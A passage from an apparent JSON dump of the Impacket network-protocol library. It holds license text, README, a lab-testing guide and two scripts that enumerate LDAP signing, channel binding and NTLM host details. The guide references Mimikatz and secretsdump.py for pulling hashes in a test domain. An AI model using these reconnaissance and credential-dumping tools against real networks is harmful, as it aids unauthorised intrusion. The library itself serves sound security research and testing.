PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nHOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nimpacket/krb5/crypto.py by the Massachusetts Institute of Technology is\ndistributed under the following license:\n\nCopyright (C) 2013 by the Massachusetts Institute of Technology.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:\n\n* Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in\n the documentation and/or other materials provided with the\n distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nCOPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGE.\n" }, { "path": "MANIFEST.in", "content": "include MANIFEST.in\ninclude LICENSE\ninclude ChangeLog.md\ninclude README.md\ninclude SECURITY.md\ninclude TESTING.md\n\ninclude requirements.txt\n\ninclude tox.ini\nrecursive-include examples tests *.txt *.py\nrecursive-include tests *\n" }, { "path": "README.md", "content": "\"Impacket_light\"\n\nImpacket\n========\n\n[![Latest Version](https://img.shields.io/pypi/v/impacket.svg)](https://pypi.python.org/pypi/impacket/)\n[![Build and test Impacket](https://github.com/fortra/impacket/actions/workflows/build_and_test.yml/badge.svg)](https://github.com/fortra/impacket/actions/workflows/build_and_test.yml)\n\nCopyright Fortra, LLC and its affiliated companies. All rights reserved.\n\nImpacket was originally created by [SecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket), and now maintained by Fortra's Core Security.\n\nImpacket is a collection of Python classes for working with network\nprotocols. Impacket is focused on providing low-level\nprogrammatic access to the packets and for some protocols (e.g.\nSMB1-3 and MSRPC) the protocol implementation itself.\nPackets can be constructed from scratch, as well as parsed from \nraw data, and the object-oriented API makes it simple to work with \ndeep hierarchies of protocols. The library provides a set of tools\nas examples of what can be done within the context of this library.\n\nWhat protocols are featured?\n----------------------------\n\n * Ethernet, Linux \"Cooked\" capture.\n * IP, TCP, UDP, ICMP, IGMP, ARP.\n * IPv4 and IPv6 Support.\n * NMB and SMB1, SMB2 and SMB3 (high-level implementations).\n * MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.\n * Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.\n * Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.\n * Portions of TDS (MSSQL) and LDAP protocol implementations.\n \nMaintainer\n==========\n\n[Core Security](https://www.coresecurity.com/)\n\n\nTable of Contents\n=================\n\n* [Getting Impacket](#getting-impacket)\n* [Setup](#setup)\n* [Testing](#testing)\n* [Licensing](#licensing)\n* [Disclaimer](#disclaimer)\n* [Contact Us](#contact-us)\n\nGetting Impacket\n================\n\n### Latest version\n\n* Impacket v0.13.0\n\n [![Python versions](https://img.shields.io/pypi/pyversions/impacket.svg)](https://pypi.python.org/pypi/impacket/)\n\n[Current and past releases](https://github.com/fortra/impacket/releases)\n\n### Development version\n\n* Impacket v0.14.0-dev (**[master branch](https://github.com/fortra/impacket/tree/master)**)\n\n [![Python versions](https://img.shields.io/badge/python-3.9%20|%203.10%20|%203.11%20|%203.12%20|%203.13-blue.svg)](https://github.com/fortra/impacket/tree/master)\n\n\nSetup\n=====\n\n### Quick start\n\n> :information_source: We recommend using `pipx` over `pip` for system-wide installations.\n\nIn order to grab the latest stable release run:\n\n python3 -m pipx install impacket\n\nIf you want to play with the unreleased changes, download the development \nversion from the [master branch](https://github.com/fortra/impacket/tree/master),\nextract the package, and execute the following command from the\ndirectory where Impacket has been unpacked:\n\n python3 -m pipx install .\n\n### Docker Support\n\nBuild Impacket's image:\n\n $ docker build -t \"impacket:latest\" .\n\nUsing Impacket's image:\n\n $ docker run -it --rm \"impacket:latest\"\n\nTesting\n=======\n\nThe library leverages the [pytest](https://docs.pytest.org/) framework for organizing\nand marking test cases, [tox](https://tox.readthedocs.io/) to automate the process of\nrunning them across supported Python versions, and [coverage](https://coverage.readthedocs.io/)\nto obtain coverage statistics.\n\nA [comprehensive testing guide](TESTING.md) is available.\n\n\nLicensing\n=========\n\nThis software is provided under a slightly modified version of\nthe Apache Software License. See the accompanying [LICENSE](LICENSE) file for\nmore information.\n\nSMBv1 and NetBIOS support based on Pysmb by Michael Teo.\n\nDisclaimer\n==========\n\nThe spirit of this Open Source initiative is to help security researchers,\nand the community, speed up research and educational activities related to\nthe implementation of networking protocols and stacks.\n\nThe information in this repository is for research and educational purposes\nand not meant to be used in production environments and/or as part\nof commercial products.\n\nIf you desire to use this code or some part of it for your own uses, we\nrecommend applying proper security development life cycle and secure coding\npractices, as well as generate and track the respective indicators of\ncompromise according to your needs.\n\n\nContact Us\n==========\n\nWhether you want to report a bug, send a patch, or give some suggestions\non this package, reach out to us at https://www.coresecurity.com/about/contact.\n\nFor security-related questions check our [security policy](SECURITY.md).\n" }, { "path": "SECURITY.md", "content": "Security Policy\n===============\n\nAlthough this initiative is not meant to be used in productive environments,\nif you consider that you have identified an issue that might affect the\nsecurity of its users, or you understand that the tool is being abused,\nyou can contact us at https://www.coresecurity.com/about/contact.\n" }, { "path": "TESTING.md", "content": "Testing\n=======\n\nThe library leverages the [pytest](https://docs.pytest.org/) framework for organizing\nand marking test cases, [tox](https://tox.readthedocs.io/) to automate the process of\nrunning them across supported Python versions, and [coverage](https://coverage.readthedocs.io/)\nto obtain coverage statistics.\n\n\nTest environment setup\n----------------------\n\nSome test cases are \"local\", meaning that don't require a target environment and can\nbe run off-line, while the bulk of the test cases are \"remote\" and requires some\nprior setup.\n\nIf you want to run the full set of library test cases, you need to prepare your\nenvironment by completing the following steps:\n\n1. Install testing requirements. You can use the following command to do so:\n\n python3 -m pip install tox -r requirements-test.txt\n\n1. [Install and configure a target Active Directory Domain Controller](#active-directory-setup-and-configuration).\n\n1. [Configure remote test cases](#configure-remote-test-cases).\n\n\n> **Important note**\n> \n> Bear in mind that some remote tests are not idempotent, that means that they perform\n> changes on the target environment and the results of the tests depends on that. As an\n> example, some tests require the creation/modification/deletion of user accounts. If those\n> tests fail at some point during the process, user accounts might lay down there and\n> subsequent tests might fail when trying to create the user account. We recommend taking\n> snapshots of the target environment that can be then rolled back after a testing session.\n\nRunning tests\n-------------\n\nOnce that's done, you would be able to run the test suite with `pytest`. For example,\nyou can run all \"local\" test cases using the following command:\n\n $ pytest -m \"not remote\"\n\nOr run the \"remote\" test cases with the following command:\n\n $ pytest -m \"remote\" \n\nIf all goes well, all test cases should pass.\n\nYou can also leverage `pytest` [markers](https://docs.pytest.org/en/4.6.x/example/markers.html)\nor [keyword expressions](https://docs.pytest.org/en/4.6.x/usage.html#select-tests)\nto select which test case you want to run. Although we recommend using `pytest`, it's also possible to run individual test\ncase modules via `unittest.main` method. For example, to only run `ldap` test cases,\nyou can execute:\n\n $ pytest -k \"ldap\"\n\n\nAutomating runs\n---------------\n\nIf you want to run the test cases in a new fresh environment, or run those across\ndifferent Python versions, you can use `tox`. You can specify the group of test cases\nyou want to run, which would be passed to `pytest`. As an example, the following\ncommand will run all \"local\" test cases across all the Python versions defined in\nthe `tox` configuration:\n\n $ tox -- -m \"not remote\"\n\nCoverage\n--------\n\nIf you want to measure coverage in your test cases run, you can use it via the\n`pytest-cov` plugin, for example by running the following command:\n\n $ pytest --cov --cov-config=tox.ini\n\n`tox` will collect and report coverage statistics as well, and combine it across\ndifferent Python version environment runs. You will have a coverage HTML report\nlocated at the default `Coverage`'s location `htlmcov/index.html`.\n\n\nConfiguration\n-------------\n\nConfiguration of all `pytest`, `coverage` and `tox` is contained in the\n[tox.ini](tox.ini) file. Refer to each tool documentation for further details\nabout the different settings.\n\n\nActive Directory Setup and Configuration\n----------------------------------------\n\nIn order to run remote test cases, a target Active Directory need to be properly\nconfigured with the expected objects. Current remote test cases are expected to\nwork against a Windows Server 2012 R2 Domain Controller. The following are the\nmain steps required:\n\n1. Make sure to disable the firewall on the interface you want to use for connecting\n to the Domain Controller.\n \n PS C:\\> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False\n\n1. Install the Active Directory Domain Services on the target server.\n \n PS C:\\> Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools \n\n1. Make sure the server's Administrator user password meet the complexity policy, as it's required\n for promoting it to Domain Controller.\n\n PS C:\\> $AdminPassword = \"\"\n PS C:\\> $Admin=[adsi](\"WinNT://$env:COMPUTERNAME/Administrator, user\")\n PS C:\\> $Admin.psbase.invoke(\"setpassword\", $AdminPassword)\n\n1. Promote the installed Windows Server 2012 R2 to a Domain Controller, and configure\n a domain of your choice.\n\n PS C:\\> $DomainName = \"\"\n PS C:\\> $NetBIOSName = \"\"\n PS C:\\> $RecoveryPassword = \"\"\n PS C:\\> $SecureRecoveryPassword = ConvertTo-SecureString $RecoveryPassword -AsPlainText -Force\n PS C:\\> Install-ADDSForest -DomainName $DomainName -InstallDns -SafeModeAdministratorPassword $SecureRecoveryPassword -DomainNetbiosName $NetBIOSName -SkipPreChecks\n\n1. Install DHCP services on the target Domain Controller.\n\n PS C:\\> Install-WindowsFeature -name DHCP -IncludeManagementTools\n\n1. Create the DHCP administration groups and authorize the server.\n \n PS C:\\> netsh dhcp add securitygroups\n PS C:\\> Restart-Service dhcpserver\n PS C:\\> Add-DhcpServerInDC -DnsName -IPAddress \n PS C:\\> $Credential = Get-Credential\n PS C:\\> Set-DhcpServerDnsCredential -Credential $Credential -ComputerName \n\n1. Be sure to enable and run the `RemoteRegistry` service on the target Domain \n Controller.\n\n PS C:\\> Start-Service RemoteRegistry\n\n1. Create a Domain User with administrative rights. This is the user that will be used\n to run the remote tests. We make sure to enable AES Kerberos encryption type and add\n it to the Domain Admins group. \n\n PS C:\\> $AdminUserName = \"\"\n PS C:\\> $AdminAccountName = \"\"\n PS C:\\> $AdminUserPassword = \"\"\n PS C:\\> $SecureAdminUserPassword = ConvertTo-SecureString $AdminUserPassword -AsPlainText -Force\n PS C:\\> New-ADUser -Name $AdminUserName -SamAccountName $AdminAccountName -UserPrincipalName $AdminAccountName@$DomainName -AccountPassword $SecureAdminUserPassword -Enabled $true -ChangePasswordAtLogon $false -KerberosEncryptionType RC4,AES128,AES256\n PS C:\\> Add-ADGroupMember -Identity \"Domain Admins\" -Members \n\n\n### LDAPS (LDAP over SSL/TLS) configuration\n\nFor running LDAPS (LDAP over SSL/TLS) test cases, make sure you have a certificate\ninstalled and configured on the target Domain Controller. You can follow\nMicrosoft's [guidelines to configure LDAPS](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority).\n\nYou can use self-signed certificates by:\n\n 1. Create a CA private key and certificate:\n\n $ openssl genrsa -aes256 -out ca_private.key 4096\n $ openssl req -new -x509 -days 3650 -key ca_private.key -out ca_public.crt\n\n 1. Copying and importing the CA public certificate into the Domain\n Controller server:\n\n PS C:\\> Import-Certificate -FilePath ca_public.crt -CertStoreLocation 'Cert:\\LocalMachine\\Root' -Verbose\n\n 1. Creating a certificate request for the LDAP service, by editing the following\n configuration file:\n \n ;----------------- request.inf -----------------\n [Version]\n Signature=\"$Windows NT$\n \n [NewRequest]\n Subject = \"CN=\" ; replace with the FQDN of the DC\n KeySpec = 1\n KeyLength = 1024\n Exportable = TRUE\n MachineKeySet = TRUE\n SMIME = False\n PrivateKeyArchive = FALSE\n UserProtected = FALSE\n UseExistingKeySet = FALSE\n ProviderName = \"Microsoft RSA SChannel Cryptographic Provider\"\n ProviderType = 12\n RequestType = PKCS10\n KeyUsage = 0xa0\n \n [EnhancedKeyUsageExtension]\n OID=1.3.6.1.5.5.7.3.1 ; this is for Server Authentication\n ;-----------------------------------------------\n\n And then running the following command:\n\n PS C:\\> certreq -new request.inf ldapcert.csr\n\n 1. Signing the LDAP service certificate with the CA, by creating the\n `v3ext.txt` configuration file:\n \n keyUsage=digitalSignature,keyEncipherment\n extendedKeyUsage=serverAuth\n subjectKeyIdentifier=hash\n\n And running the following command:\n \n $ openssl x509 -req -days 365 -in ldapcert.csr -CA ca_public.crt -CAkey ca_private.key -extfile v3ext.txt -set_serial 01 -out ldapcert.crt\n\n 1. Copying and installing the new signed LDAP service certificate into\n the Domain Controller server:\n\n PS C:\\> certreq -accept ldapcert.crt\n\n 1. Finally, restarting the Domain Controller.\n\n\n### Mimilib configuration\n\n[Mimilib](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) test\ncases require the service to be installed on the target Domain Controller. You can\ndo that by running Mimikatz with an elevated user and executing:\n\n mimikatz # rpc::server\n\n\nConfigure Remote Test Cases\n---------------------------\n\nCreate a copy of the [dcetest.cfg.template](tests/dcetests.cfg.template) file and\nconfigure it with the necessary information associated to the Active Directory you\nconfigured. Path to the configuration file to use when running tests can be then\nspecified in the following ways:\n\n * Using the pytest `--remote-config` command-line option.\n * Using the pytest `remote-config` option in `tox.ini`. \n * Using the `REMOTE_CONFIG` environment variable.\n * Default to loading from `tests/dcetests.cg`.\n\nFor example, you can keep configuration of different environments in\nseparate files, and specify which one you want the test to run against:\n\n $ pytest --remote-config=tests/dcetests-win2016.cfg\n $ pytest --remote-config=tests/dcetests-win2019.cfg\n\nMake sure you set a user with proper administrative privileges on the\ntarget Active Directory domain and that the user hashes and keys match with those\nin the environment. Hashes and Kerberos keys can be grabbed from the target Domain\nController using [secretsdump.py](examples/secretsdump.py) example script.\n\nMake sure also to have full network visibility into the target hosts and be able to\nresolve DNS queries for the Active Directory Domain configured. If you don't want to\nchange your test machine's DNS settings to point to the AD DNS server, you can\nconfigure your system to statically resolve (e.g. via `/etc/hosts` file) the host\nand domain FQDN to the server's IP address.\n" }, { "path": "examples/CheckLDAPStatus.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Check LDAP signing status and LDAPS channel binding status.\n# First, the script use the given domain controller IP and domain \n# name to resolve all the domain controllers. Then the checks are\n# performed against all domain controllers.\n#\n# Author:\n# Thomas Seigneuret (@zblurx)\n\nimport argparse\nimport logging\nimport sys\nfrom dns.resolver import Resolver\nfrom OpenSSL.SSL import SysCallError\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.ldap.ldap import LDAPConnection, LDAPSessionError\n\nclass CheckLDAP:\n def __init__(self, domain, dc_ip, timeout):\n self.domain = domain\n self.dc_ip = dc_ip\n self.timeout = timeout\n\n def list_dc(self):\n dc_list = []\n resolver = Resolver()\n resolver.timeout = self.timeout\n resolver.nameservers = [self.dc_ip]\n dc_query = resolver.resolve(\n f\"_ldap._tcp.dc._msdcs.{self.domain}\", 'SRV', tcp=True)\n for dc in dc_query:\n dc_list.append(str(dc.target).rstrip(\".\"))\n return dc_list \n \n def run(self):\n dc_list = self.list_dc()\n logging.info(f\"Found {len(dc_list)} domain controller(s) in {self.domain}\")\n for dc in dc_list:\n signing_required = self.check_ldap_signing(dc)\n channel_binding_status = self.check_ldaps_cbt(dc)\n print(f\"Hostname: {dc}\\n\\t> LDAP Signing Required: {signing_required}\\n\\t> LDAPS Channel Binding Status: {channel_binding_status}\")\n\n def check_ldaps_cbt(self, hostname):\n cbt_status = \"Never\"\n ldap_url = f\"ldaps://{hostname}\"\n try:\n ldap_connection = LDAPConnection(url=ldap_url)\n ldap_connection.channel_binding_value = None\n ldap_connection.login(user=\" \", domain=self.domain)\n except LDAPSessionError as e:\n if str(e).find(\"data 80090346\") >= 0:\n cbt_status = \"Always\" # CBT is Required\n # Login failed (wrong credentials). test if we get an error with an existing, but wrong CBT -> When supported\n elif str(e).find(\"data 52e\") >= 0:\n ldap_connection = LDAPConnection(url=ldap_url)\n new_cbv = bytearray(ldap_connection.channel_binding_value)\n new_cbv[15] = (new_cbv[3] + 1) % 256\n ldap_connection.channel_binding_value = bytes(new_cbv)\n try:\n ldap_connection.login(user=\" \", domain=self.domain)\n except LDAPSessionError as e:\n if str(e).find(\"data 80090346\") >= 0:\n logging.debug(f\"LDAPS channel binding is set to 'When Supported' on host {hostname}\")\n cbt_status = \"When Supported\" # CBT is When Supported\n else:\n logging.debug(f\"LDAPSessionError while checking for channel binding requirements (likely NTLM disabled): {e!s}\")\n except SysCallError as e:\n logging.debug(f\"Received SysCallError when trying to enumerate channel binding support: {e!s}\")\n if e.args[1] in [\"ECONNRESET\", \"WSAECONNRESET\", \"Unexpected EOF\"]:\n cbt_status = \"No TLS cert\"\n else:\n raise\n return cbt_status\n\n def check_ldap_signing(self, hostname):\n signing_required = False\n ldap_url = f\"ldap://{hostname}\"\n try:\n ldap_connection = LDAPConnection(url=ldap_url, signing=False)\n ldap_connection.login(domain=self.domain)\n logging.debug(f\"LDAP signing is not enforced on {hostname}\")\n except LDAPSessionError as e:\n if str(e).find(\"strongerAuthRequired\") >= 0:\n logging.debug(f\"LDAP signing is enforced on {hostname}\")\n signing_required = True\n else:\n logging.debug(f\"LDAPSessionError while checking for signing requirements (likely NTLM disabled): {e!s}\")\n return signing_required\n\nif __name__ == '__main__':\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"LDAP signing and channel binding enumeration utility.\")\n parser.add_argument('-dc-ip', required=True, action='store', metavar=\"ip address\", help='IP Address of a domain controller or a DNS resolver for the domain.')\n parser.add_argument('-domain', required=True, action='store', help='')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-timeout', action='store', type=int, default=15, help='DNS timeout')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n logger.init(options.ts, options.debug)\n\n try:\n dumper = CheckLDAP(options.domain, options.dc_ip, options.timeout)\n logging.info(f\"Targeted domain: {options.domain}\")\n dumper.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n" }, { "path": "examples/DumpNTLMInfo.py", "content": "#!/usr/bin/env python\r\n# Impacket - Collection of Python classes for working with network protocols.\r\n#\r\n# Copyright Fortra, LLC and its affiliated companies \r\n#\r\n# All rights reserved.\r\n#\r\n# This software is provided under a slightly modified version\r\n# of the Apache Software License. See the accompanying LICENSE file\r\n# for more information.\r\n#\r\n# Description:\r\n# Dump remote host information in ntlm authentication model, without credentials.\r\n# For SMB protocols (1/2/3), it's easy to use SMBConnection class (thanks to @agsolino), \r\n# but since negotiate response is not available in original classes, \r\n# we made out custom classes based on them.\r\n# The usefull information in negotiate response are \"Dialect Version\", \"Signing Options\",\r\n# \"Maximum bytes allowed per smb request\" and \"Servers time information\".\r\n# The point is sometimes server dosn't include \"boot time\" in response. But we show it,\r\n# when available, in this script.\r\n# \r\n# It's very easy to use:\r\n# python DumpNTLMInfo.py 192.168.1.63\r\n#\r\n# Author:\r\n# Alex Romero (@NtAlexio2)\r\n#\r\n# Reference for:\r\n# [MS-SMB2]\r\n# [MS-RPCE]\r\n#\r\n# ToDo:\r\n# [ ] MSSQL\r\n# [ ] Find new protocols using NTLM for authentication in network.\r\n# \r\n\r\nimport os\r\nimport sys\r\nimport argparse\r\nimport logging\r\nimport struct\r\nimport socket\r\nimport math, string, random\r\nfrom six import indexbytes\r\nfrom datetime import datetime, timedelta, timezone\r\n\r\nfrom impacket import version\r\nfrom impacket import nmb, ntlm\r\nfrom impacket.examples import logger\r\nfrom impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBNTLMDialect_Parameters,\\\r\n SMBNTLMDialect_Data, SMBExtended_Security_Parameters, SMBExtended_Security_Data, UnsupportedFeature,\\\r\n SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Parameters, SMBSessionSetupAndX_Extended_Response_Parameters,\\\r\n SMBSessionSetupAndX_Extended_Response_Data, SMBSessionSetupAndXResponse_Parameters, SMB_DIALECT\r\nfrom impacket.smb3structs import *\r\nfrom impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech\r\nfrom impacket.nt_errors import STATUS_SUCCESS, STATUS_MORE_PROCESSING_REQUIRED\r\nfrom impacket.uuid import uuidtup_to_bin\r\nfrom impacket.dcerpc.v5 import transport, epm\r\nfrom impacket.dcerpc.v5.rpcrt import *\r\n\r\n\r\nEPOCH_AS_FILETIME = 116444736000000000 # January 1, 1970 as MS file time\r\n\r\n\r\nclass RPC:\r\n def __init__(self, target) -> None:\r\n self.MaxTrasmitionSize = 0\r\n self._initializeTransport(target)\r\n\r\n def GetChallange(self):\r\n ntlmChallenge = None\r\n packet = self._create_bind_request()\r\n self._rpctransport.send(packet.get_packet())\r\n buffer = self._rpctransport.recv()\r\n if buffer != 0:\r\n response = MSRPCHeader(buffer)\r\n bindResp = MSRPCBindAck(response.getData())\r\n\r\n self.MaxTrasmitionSize = bindResp['max_rfrag']\r\n\r\n ntlmChallenge = ntlm.NTLMAuthChallenge(bindResp['auth_data'])\r\n return ntlmChallenge\r\n\r\n def _initializeTransport(self, target):\r\n self._rpctransport = transport.DCERPCTransportFactory(r'ncacn_ip_tcp:%s[135]' % target)\r\n self._rpctransport.set_credentials('', '', '', '', '')\r\n self._rpctransport.set_dport(135)\r\n self._rpctransport.connect()\r\n\r\n def _create_bind_request(self):\r\n bind = MSRPCBind()\r\n item = CtxItem()\r\n item['AbstractSyntax'] = epm.MSRPC_UUID_PORTMAP\r\n item['TransferSyntax'] = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))\r\n item['ContextID'] = 0\r\n item['TransItems'] = 1\r\n bind.addCtxItem(item)\r\n\r\n packet = MSRPCHeader()\r\n packet['type'] = MSRPC_BIND\r\n packet['pduData'] = bind.getData()\r\n packet['call_id'] = 1\r\n\r\n auth = ntlm.getNTLMSSPType1('', '', signingRequired=True, use_ntlmv2=True)\r\n sec_trailer = SEC_TRAILER()\r\n sec_trailer['auth_type'] = RPC_C_AUTHN_WINNT\r\n sec_trailer['auth_level'] = RPC_C_AUTHN_LEVEL_PKT_INTEGRITY\r\n sec_trailer['auth_ctx_id'] = 0 + 79231 \r\n pad = (4 - (len(packet.get_packet()) % 4)) % 4\r\n if pad != 0:\r\n packet['pduData'] += b'\\xFF'*pad\r\n sec_trailer['auth_pad_len']=pad\r\n packet['sec_trailer'] = sec_trailer\r\n packet['auth_data'] = auth\r\n\r\n return packet\r\n\r\n\r\nclass SMB1:\r\n def __init__(self, remote_name, remote_host, my_name=None, \r\n sess_port=445, timeout=60, session=None, negSessionResponse=None):\r\n self._uid = 0\r\n self._dialects_data = None\r\n self._SignatureRequired = False\r\n self._dialects_parameters = None\r\n self.__flags1 = SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS\r\n self.__flags2 = SMB.FLAGS2_EXTENDED_SECURITY | SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES\r\n self.__timeout = timeout\r\n self._session = session\r\n self._my_name = my_name\r\n self._auth = None\r\n\r\n if session is None:\r\n self._session = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, nmb.TYPE_SERVER, sess_port, self.__timeout)\r\n\r\n self._negotiateResponse = self._negotiateSession(negSessionResponse)\r\n\r\n def GetNegotiateResponse(self):\r\n return self._negotiateResponse\r\n\r\n def GetChallange(self):\r\n packet = NewSMBPacket()\r\n if self._SignatureRequired:\r\n packet['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE\r\n sessionSetup = self._createSessionSetupRequest()\r\n packet.addCommand(sessionSetup)\r\n self.send(packet)\r\n packet = self.receive()\r\n if packet.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX):\r\n self._uid = packet['Uid']\r\n sessionResponse = SMBCommand(packet['Data'][0])\r\n sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])\r\n sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = packet['Flags2'])\r\n sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']\r\n sessionData.fromString(sessionResponse['Data'])\r\n self._respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])\r\n ntlmChallenge = ntlm.NTLMAuthChallenge(self._respToken['ResponseToken'])\r\n return ntlmChallenge\r\n\r\n def Authenticate(self):\r\n type3, _ = ntlm.getNTLMSSPType3(self._auth, self._respToken['ResponseToken'], '', '', '', '', '', use_ntlmv2=True)\r\n\r\n packet = NewSMBPacket()\r\n if self._SignatureRequired:\r\n packet['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE\r\n\r\n respToken2 = SPNEGO_NegTokenResp()\r\n respToken2['ResponseToken'] = type3.getData()\r\n sessionSetup = self._createSessionSetupRequest()\r\n sessionSetup['Parameters']['SecurityBlobLength'] = len(respToken2)\r\n sessionSetup['Data']['SecurityBlob'] = respToken2.getData()\r\n\r\n packet.addCommand(sessionSetup)\r\n self.send(packet)\r\n packet = self.receive()\r\n\r\n try:\r\n if packet.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX):\r\n sessionResponse = SMBCommand(packet['Data'][0])\r\n sessionParameters = SMBSessionSetupAndXResponse_Parameters(sessionResponse['Parameters'])\r\n self._action = sessionParameters['Action']\r\n return True\r\n except:\r\n pass\r\n return False\r\n\r\n def send(self, negoPacket):\r\n negoPacket['Uid'] = self._uid\r\n negoPacket['Pid'] = (os.getpid() & 0xFFFF)\r\n negoPacket['Flags1'] |= self.__flags1\r\n negoPacket['Flags2'] |= self.__flags2\r\n self._session.send_packet(negoPacket.getData())\r\n\r\n def receive(self):\r\n r = self._session.recv_packet(self.__timeout)\r\n return NewSMBPacket(data = r.get_trailer())\r\n\r\n def _negotiateSession(self, negPacket = None):\r\n def parsePacket(negoPacket):\r\n if negoPacket['Flags2'] & SMB.FLAGS2_UNICODE:\r\n self.__flags2 |= SMB.FLAGS2_UNICODE\r\n\r\n if negoPacket.isValidAnswer(SMB.SMB_COM_NEGOTIATE):\r\n sessionResponse = SMBCommand(negoPacket['Data'][0])\r\n self._dialects_parameters = SMBNTLMDialect_Parameters(sessionResponse['Parameters'])\r\n self._dialects_data = SMBNTLMDialect_Data()\r\n self._dialects_data['ChallengeLength'] = self._dialects_parameters['ChallengeLength']\r\n self._dialects_data.fromString(sessionResponse['Data'])\r\n if self._dialects_parameters['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:\r\n self._dialects_parameters = SMBExtended_Security_Parameters(sessionResponse['Parameters'])\r\n self._dialects_data = SMBExtended_Security_Data(sessionResponse['Data'])\r\n if self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SIGNATURES_REQUIRED:\r\n self._SignatureRequired = True\r\n else:\r\n if self._dialects_parameters['DialectIndex'] == 0xffff:\r\n raise UnsupportedFeature(\"Remote server does not know NT LM 0.12\")\r\n\r\n return self._wrapper(sessionResponse)\r\n\r\n if negPacket is None:\r\n negoPacket = NewSMBPacket()\r\n negSession = SMBCommand(SMB.SMB_COM_NEGOTIATE)\r\n self.__flags2 = self.__flags2 | SMB.FLAGS2_EXTENDED_SECURITY\r\n\r\n negSession['Data'] = b'\\x02NT LM 0.12\\x00'\r\n negoPacket.addCommand(negSession)\r\n self.send(negoPacket)\r\n\r\n negoPacket = self.receive()\r\n return parsePacket(negoPacket)\r\n\r\n return parsePacket(NewSMBPacket(data = negPacket))\r\n\r\n def _createSessionSetupRequest(self):\r\n sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()\r\n sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()\r\n sessionSetup['Parameters']['MaxBufferSize'] = 61440\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2\r\n sessionSetup['Parameters']['VcNumber'] = 1\r\n sessionSetup['Parameters']['SessionKey'] = 